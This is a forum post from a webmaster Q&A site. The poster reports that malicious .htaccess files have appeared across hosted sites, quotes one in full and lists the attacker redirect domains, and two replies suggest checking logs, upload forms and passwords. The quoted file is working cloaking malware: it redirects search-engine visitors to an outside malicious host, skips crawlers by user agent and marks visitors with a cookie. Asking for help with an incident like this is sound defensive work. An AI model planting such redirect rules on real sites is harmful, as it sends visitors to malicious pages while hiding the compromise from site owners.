Mobile app version of vmapp.org
Login or Join
Dunderdale272

: Site compromised .htaccess files everywhere Some of the sites we're hosting are compromised by... I don't know what. Every directory on the webserver contains a .htaccess file which redirects a

@Dunderdale272

Posted in: #Apache #Htaccess #ModRewrite #Security

Some of the sites we're hosting are compromised by... I don't know what.
Every directory on the webserver contains a .htaccess file which redirects a user coming from a search engine to a page which doesn't even exist - see the .htaccess file below.

The problem first appeared on 10 December 2010 and has been spreading ever since. It affected 8 servers at 3 different hosting providers.

I've found some links in Google to similar problems but no explanation as to what is going on. The solution is very simple: just delete the file, but that's not what I'm after. The redirect url seems to be different for every infected domain, here's a list:


indanetwall.net
checkforsec.com
trackallnet.com
bonusforall.net
searchforallweb.com
sslabssys.com


Googling on those lead to more people reporting the same problem using all kinds of different systems.

Apparently it had nothing to do with a specific server or a specific server configuration. All the latest updates were installed for the OS and installed CMS systems. It also affected servers without any CMS installed so we couldn't put the blame there.

We don't know how the files got there but it wasn't through ftp. In the end we changed all passwords for the ftp accounts, hosting provider account, databases, anything.

We did a thorough scan of all the servers and the local network but didn't find anything there. So the final conclusion is that somebody somehow got hold of a bunch of passwords to access our systems.

Luckily they didn't do any 'real' damage and in the end it was no more than a big annoyance... But it could've been much worse.

The htaccess file looks like this:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http://)?([^/?]*.)?(google.|yahoo.|bing.|msn.|yandex.|ask.|excite.|altavista.|netscape.|aol.|hotbot.|goto.|infoseek.|mamma.|alltheweb.|lycos.|search.|metacrawler.|rambler.|mail.|dogpile.|ya.|/search?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q=cache:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|AcesExplorer|Amfibi|AmigasOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|AsksJeeves|asterias|AtrenkosNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE-Preload|CFNetwork|cococ|Combine|Crawl|curl|Dangershiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|FcuksYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda-Search|HP-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus-Notes|Lycos|Lynx|Mac_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac_PPC|Macs10|MacsOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os=Mac|P900i|panscient|perl|PlayStation|POE-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Seriess60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|SoapsClient|Socialmarks|SpheresScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Wins9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windowss95|Windowss98|WindowssCE|WindowssNTs4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ searchforallweb.com/cgi-bin/r.cgi?p=9004&i=138ee363&j=315&m=c1ca5d58dda23245366719cd597ac0d5&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo


Has anyone experienced similar problems? Does someone know what this is and how we can stop it?

10.05% popularity Vote Up Vote Down


Login to follow query

More posts by @Dunderdale272

2 Comments

Sorted by latest first Latest Oldest Best

 

@Angela700

You need to check the date the files were uploaded and then review your FTP and HTTP logs. You probably allowed for file uploading via some script by not sanitizing your inputs for directory transversal, or you have a program running either on request or timed that drops these files in.

If it's a shared host, your host could be compromised, and they probably haven't set up their shares correctly to not allow for things like this. One of the other 'customers' is exploiting the server.

10% popularity Vote Up Vote Down


 

@Hamaas447

If you noticed it "at several hosting providers" then I would think its highly likely something to do with a site on your server(s) not todo with the server itself, unless your bringing over certain config files to new hosting providers etc?

If I was you, I would enforce password changes, someones got access to your server or directories that they shouldn't have?!

What about upload forms? Is anyone using a poorly secured one with no file upload restrictions?
FTP, does anyone have access that should not, can people access more than they should through it?

As I said I would do a password changes, also do updates on any cms's you might have running on there e.g. Joomla etc encase there are fixes for known security issues.

Hope that was at least slightly helpful :)

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme